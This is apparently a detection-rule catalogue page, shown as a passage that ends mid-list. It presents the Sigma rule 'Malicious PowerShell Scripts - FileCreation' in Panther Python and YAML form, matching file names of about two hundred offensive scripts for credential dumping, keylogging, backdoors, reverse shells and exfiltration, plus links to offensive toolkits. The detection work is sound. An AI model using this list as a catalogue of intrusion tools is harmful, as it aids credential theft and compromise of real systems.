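Running the block prints an ALERT for the download cradle and the lower-cased invocation, a pass for the EC2 launch-module block (filtered) and the benign listing, and reports `lowercased` as the event the case-sensitive rendering misses; the simplest fix in the pasted query is to `.lower()` both sides of every comparison. Two further checks before relying on this rule: Script Block Logging must actually be on (the policy value is `HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging` set to 1), and long script blocks are written as several 4104 events, so a name that straddles a chunk boundary is not seen as one substring. Short entries such as `PowerUp` and `PowerView` are bare substrings, so tune the list against your own baseline before setting the level to high.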
high
Malicious PowerShell Scripts - FileCreation
Detects the creation of known offensive PowerShell scripts used for exploitation.
status: test · author: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein · id: f331aa1f-8c53-4fc3-b083-cc159bc971cb
panther query
def rule(event):
    if any(
        [
            any(
                [
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Add-ConstrainedDelegationBackdoor.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Add-Exfiltration.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Add-Persistence.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Add-RegBackdoor.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Add-RemoteRegBackdoor.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Add-ScrnSaveBackdoor.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\ADRecon.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\AzureADRecon.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\BadSuccessor.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Check-VM.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\ConvertTo-ROT13.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Copy-VSS.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Create-MultipleSessions.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\DNS_TXT_Pwnage.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\dnscat2.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Do-Exfiltration.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\DomainPasswordSpray.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Download_Execute.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Download-Execute-PS.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Enable-DuplicateToken.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Enabled-DuplicateToken.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Execute-Command-MSSQL.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Execute-DNSTXT-Code.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Execute-OnTime.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\ExetoText.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Exploit-Jboss.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Find-AVSignature.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Find-Fruit.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Find-GPOLocation.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Find-TrustedDocuments.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\FireBuster.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\FireListener.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-ApplicationHost.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-ChromeDump.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-ClipboardContents.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-ComputerDetail.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-FoxDump.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-GPPAutologon.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-GPPPassword.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-IndexedItem.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-Keystrokes.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-LSASecret.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-MicrophoneAudio.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-PassHashes.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-PassHints.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-RegAlwaysInstallElevated.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-RegAutoLogon.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-RickAstley.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-Screenshot.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-SecurityPackages.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-ServiceFilePermission.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-ServicePermission.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-ServiceUnquoted.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-SiteListPassword.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-System.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-TimedScreenshot.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-UnattendedInstallFile.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-Unconstrained.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-USBKeystrokes.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-VaultCredential.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-VulnAutoRun.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-VulnSchTask.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-WebConfig.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Get-WebCredentials.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Get-WLAN-Keys.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Gupt-Backdoor.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\HTTP-Backdoor.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\HTTP-Login.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Install-ServiceBinary.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Install-SSP.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-ACLScanner.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-ADSBackdoor.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-AmsiBypass.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-ARPScan.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-BackdoorLNK.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-BadPotato.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-BetterSafetyKatz.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-BruteForce.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-BypassUAC.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Carbuncle.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Certify.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-ConPtyShell.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-CredentialInjection.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-CredentialsPhish.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-DAFT.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-DCSync.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Decode.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-DinvokeKatz.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-DllInjection.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-DNSExfiltrator.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-DNSUpdate.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-DowngradeAccount.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-EgressCheck.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Encode.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-EventViewer.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-Eyewitness.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-FakeLogonScreen.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Farmer.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-Get-RBCD-Threaded.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Gopher.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Grouper2.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Grouper3.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-HandleKatz.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-Interceptor.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-Internalmonologue.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Inveigh.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-InveighRelay.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-JSRatRegsvr.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-JSRatRundll.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-KrbRelay.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-KrbRelayUp.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-LdapSignCheck.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Lockless.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-MalSCCM.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Mimikatz.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-MimikatzWDigestDowngrade.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-Mimikittenz.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-MITM6.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-NanoDump.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-NetRipper.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-NetworkRelay.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-NinjaCopy.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-OxidResolver.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-P0wnedshell.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-P0wnedshellx86.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Paranoia.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-PortScan.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PoshRatHttp.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PoshRatHttps.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-PostExfil.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-PowerDump.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PowerDPAPI.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PowerShellIcmp.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PowerShellTCP.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PowerShellTcpOneLine.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PowerShellTcpOneLineBind.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PowerShellUdp.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PowerShellUdpOneLine.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PowerShellWMI.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PowerThIEf.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-PPLDump.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Prasadhak.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-PsExec.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-PsGcat.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-PsGcatAgent.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-PSInject.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-PsUaCme.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-ReflectivePEInjection.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-ReverseDNSLookup.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Rubeus.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-RunAs.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-SafetyKatz.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-SauronEye.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-SCShell.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Seatbelt.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-ServiceAbuse.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-SessionGopher.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-ShellCode.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-SMBScanner.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Snaffler.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-Spoolsample.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-SSHCommand.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-SSIDExfil.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-StandIn.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-StickyNotesExtract.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Tater.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-Thunderfox.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-ThunderStruck.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-TokenManipulation.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-Tokenvator.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-TotalExec.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-UrbanBishop.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-UserHunter.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-VoiceTroll.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Whisker.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-WinEnum.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-winPEAS.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-WireTap.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-WmiCommand.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Invoke-WScriptBypassUAC.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Invoke-Zerologon.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Keylogger.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\MailRaider.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\New-HoneyHash.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\OfficeMemScraper.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Offline_Winpwn.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-CHM.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-DnsTxt.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-Excel.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-HTA.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-Java.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-JS.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-Minidump.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Out-RundllCommand.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-SCF.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-SCT.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-Shortcut.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-WebQuery.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Out-Word.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Parse_Keys.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Port-Scan.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\PowerBreach.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\powercat.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Powermad.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\PowerRunAsSystem.psm1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\PowerSharpPack.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\PowerUp.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\PowerUpSQL.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\PowerView.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\PSAsyncShell.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\RemoteHashRetrieval.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Remove-Persistence.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Remove-PoshRat.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Remove-Update.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Run-EXEonRemote.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Schtasks-Backdoor.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Set-DCShadowPermissions.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Set-MacAttribute.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Set-RemotePSRemoting.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Set-RemoteWMI.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Set-Wallpaper.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Show-TargetScreen.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\Speak.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Start-CaptureServer.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\Start-WebcamRecorder.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\StringToBase64.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\TexttoExe.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\Veeam-Get-Creds.ps1"),
                    event.deep_get("TargetFilename", default="").endswith(
                        "\\VolumeShadowCopyTools.ps1"
                    ),
                    event.deep_get("TargetFilename", default="").endswith("\\WinPwn.ps1"),
                    event.deep_get("TargetFilename", default="").endswith("\\WSUSpendu.ps1"),
                ]
            ),
            all(
                [
                    "Invoke-Sharp" in event.deep_get("TargetFilename", default=""),
                    event.deep_get("TargetFilename", default="").endswith(".ps1"),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Malicious PowerShell Scripts - FileCreation
id: f331aa1f-8c53-4fc3-b083-cc159bc971cb
related:
    - id: 41025fd7-0466-4650-a813-574aaacbe7f4
      type: similar
status: test
description: Detects the creation of known offensive powershell scripts used for exploitation
references:
    - https://github.com/PowerShellMafia/PowerSploit
    - https://github.com/NetSPI/PowerUpSQL
    - https://github.com/CsEnox/EventViewer-UACBypass
    - https://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu
    - https://github.com/nettitude/Invoke-PowerThIEf
    - https://github.com/S3cur3Th1sSh1t/WinPwn
    - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries
    - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1
    - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1
    - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1
    - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1
    - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec
    - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec
    - https://github.com/HarmJ0y/DAMP
    - https://github.com/samratashok/nishang
    - https://github.com/DarkCoderSc/PowerRunAsSystem/
    - https://github.com/besimorhino/powercat
    - https://github.com/Kevin-Robertson/Powermad
    - https://github.com/adrecon/ADRecon
    - https://github.com/adrecon/AzureADRecon
    - https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1
    - https://github.com/The-Viper-One/Invoke-PowerDPAPI/
    - https://github.com/Arno0x/DNSExfiltrator/
author: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein
date: 2018-04-07
modified: 2025-12-10
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: file_event
    product: windows
detection:
    selection_generic:
        TargetFilename|endswith:
            # Note: Please ensure alphabetical order when adding new entries
            - '\Add-ConstrainedDelegationBackdoor.ps1'
            - '\Add-Exfiltration.ps1'
            - '\Add-Persistence.ps1'
            - '\Add-RegBackdoor.ps1'
            - '\Add-RemoteRegBackdoor.ps1'
            - '\Add-ScrnSaveBackdoor.ps1'
            - '\ADRecon.ps1'
            - '\AzureADRecon.ps1'
            - '\BadSuccessor.ps1'
            - '\Check-VM.ps1'
            - '\ConvertTo-ROT13.ps1'
            - '\Copy-VSS.ps1'
            - '\Create-MultipleSessions.ps1'
            - '\DNS_TXT_Pwnage.ps1'
            - '\dnscat2.ps1'
            - '\Do-Exfiltration.ps1'
            - '\DomainPasswordSpray.ps1'
            - '\Download_Execute.ps1'
            - '\Download-Execute-PS.ps1'
            - '\Enable-DuplicateToken.ps1'
            - '\Enabled-DuplicateToken.ps1'
            - '\Execute-Command-MSSQL.ps1'
            - '\Execute-DNSTXT-Code.ps1'
            - '\Execute-OnTime.ps1'
            - '\ExetoText.ps1'
            - '\Exploit-Jboss.ps1'
            - '\Find-AVSignature.ps1'
            - '\Find-Fruit.ps1'
            - '\Find-GPOLocation.ps1'
            - '\Find-TrustedDocuments.ps1'
            - '\FireBuster.ps1'
            - '\FireListener.ps1'
            - '\Get-ApplicationHost.ps1'
            - '\Get-ChromeDump.ps1'
            - '\Get-ClipboardContents.ps1'
            - '\Get-ComputerDetail.ps1'
            - '\Get-FoxDump.ps1'
            - '\Get-GPPAutologon.ps1'
            - '\Get-GPPPassword.ps1'
            - '\Get-IndexedItem.ps1'
            - '\Get-Keystrokes.ps1'
            - '\Get-LSASecret.ps1'
            - '\Get-MicrophoneAudio.ps1'
            - '\Get-PassHashes.ps1'
            - '\Get-PassHints.ps1'
            - '\Get-RegAlwaysInstallElevated.ps1'
            - '\Get-RegAutoLogon.ps1'
            - '\Get-RickAstley.ps1'
            - '\Get-Screenshot.ps1'
            - '\Get-SecurityPackages.ps1'
            - '\Get-ServiceFilePermission.ps1'
            - '\Get-ServicePermission.ps1'
            - '\Get-ServiceUnquoted.ps1'
            - '\Get-SiteListPassword.ps1'
            - '\Get-System.ps1'
            - '\Get-TimedScreenshot.ps1'
            - '\Get-UnattendedInstallFile.ps1'
            - '\Get-Unconstrained.ps1'
            - '\Get-USBKeystrokes.ps1'
            - '\Get-VaultCredential.ps1'
            - '\Get-VulnAutoRun.ps1'
            - '\Get-VulnSchTask.ps1'
            - '\Get-WebConfig.ps1'
            - '\Get-WebCredentials.ps1'
            - '\Get-WLAN-Keys.ps1'
            - '\Gupt-Backdoor.ps1'
            - '\HTTP-Backdoor.ps1'
            - '\HTTP-Login.ps1'
            - '\Install-ServiceBinary.ps1'
            - '\Install-SSP.ps1'
            - '\Invoke-ACLScanner.ps1'
            - '\Invoke-ADSBackdoor.ps1'
            - '\Invoke-AmsiBypass.ps1'
            - '\Invoke-ARPScan.ps1'
            - '\Invoke-BackdoorLNK.ps1'
            - '\Invoke-BadPotato.ps1'
            - '\Invoke-BetterSafetyKatz.ps1'
            - '\Invoke-BruteForce.ps1'
            - '\Invoke-BypassUAC.ps1'
            - '\Invoke-Carbuncle.ps1'
            - '\Invoke-Certify.ps1'
            - '\Invoke-ConPtyShell.ps1'
            - '\Invoke-CredentialInjection.ps1'
            - '\Invoke-CredentialsPhish.ps1'
            - '\Invoke-DAFT.ps1'
            - '\Invoke-DCSync.ps1'
            - '\Invoke-Decode.ps1'
            - '\Invoke-DinvokeKatz.ps1'
            - '\Invoke-DllInjection.ps1'
            - '\Invoke-DNSExfiltrator.ps1'
            - '\Invoke-DNSUpdate.ps1'
            - '\Invoke-DowngradeAccount.ps1'
            - '\Invoke-EgressCheck.ps1'
            - '\Invoke-Encode.ps1'
            - '\Invoke-EventViewer.ps1'
            - '\Invoke-Eyewitness.ps1'
            - '\Invoke-FakeLogonScreen.ps1'
            - '\Invoke-Farmer.ps1'
            - '\Invoke-Get-RBCD-Threaded.ps1'
            - '\Invoke-Gopher.ps1'
            - '\Invoke-Grouper2.ps1'
            - '\Invoke-Grouper3.ps1'
            - '\Invoke-HandleKatz.ps1'
            - '\Invoke-Interceptor.ps1'
            - '\Invoke-Internalmonologue.ps1'
            - '\Invoke-Inveigh.ps1'
            - '\Invoke-InveighRelay.ps1'
            - '\Invoke-JSRatRegsvr.ps1'
            - '\Invoke-JSRatRundll.ps1'
            - '\Invoke-KrbRelay.ps1'
            - '\Invoke-KrbRelayUp.ps1'
            - '\Invoke-LdapSignCheck.ps1'
            - '\Invoke-Lockless.ps1'
            - '\Invoke-MalSCCM.ps1'
            - '\Invoke-Mimikatz.ps1'
            - '\Invoke-MimikatzWDigestDowngrade.ps1'
            - '\Invoke-Mimikittenz.ps1'
            - '\Invoke-MITM6.ps1'
            - '\Invoke-NanoDump.ps1'
            - '\Invoke-NetRipper.ps1'
            - '\Invoke-NetworkRelay.ps1'
            - '\Invoke-NinjaCopy.ps1'
            - '\Invoke-OxidResolver.ps1'
            - '\Invoke-P0wnedshell.ps1'
            - '\Invoke-P0wnedshellx86.ps1'
            - '\Invoke-Paranoia.ps1'
            - '\Invoke-PortScan.ps1'
            - '\Invoke-PoshRatHttp.ps1'
            - '\Invoke-PoshRatHttps.ps1'
            - '\Invoke-PostExfil.ps1'
            - '\Invoke-PowerDump.ps1'
            - '\Invoke-PowerDPAPI.ps1'
            - '\Invoke-PowerShellIcmp.ps1'
            - '\Invoke-PowerShellTCP.ps1'
            - '\Invoke-PowerShellTcpOneLine.ps1'
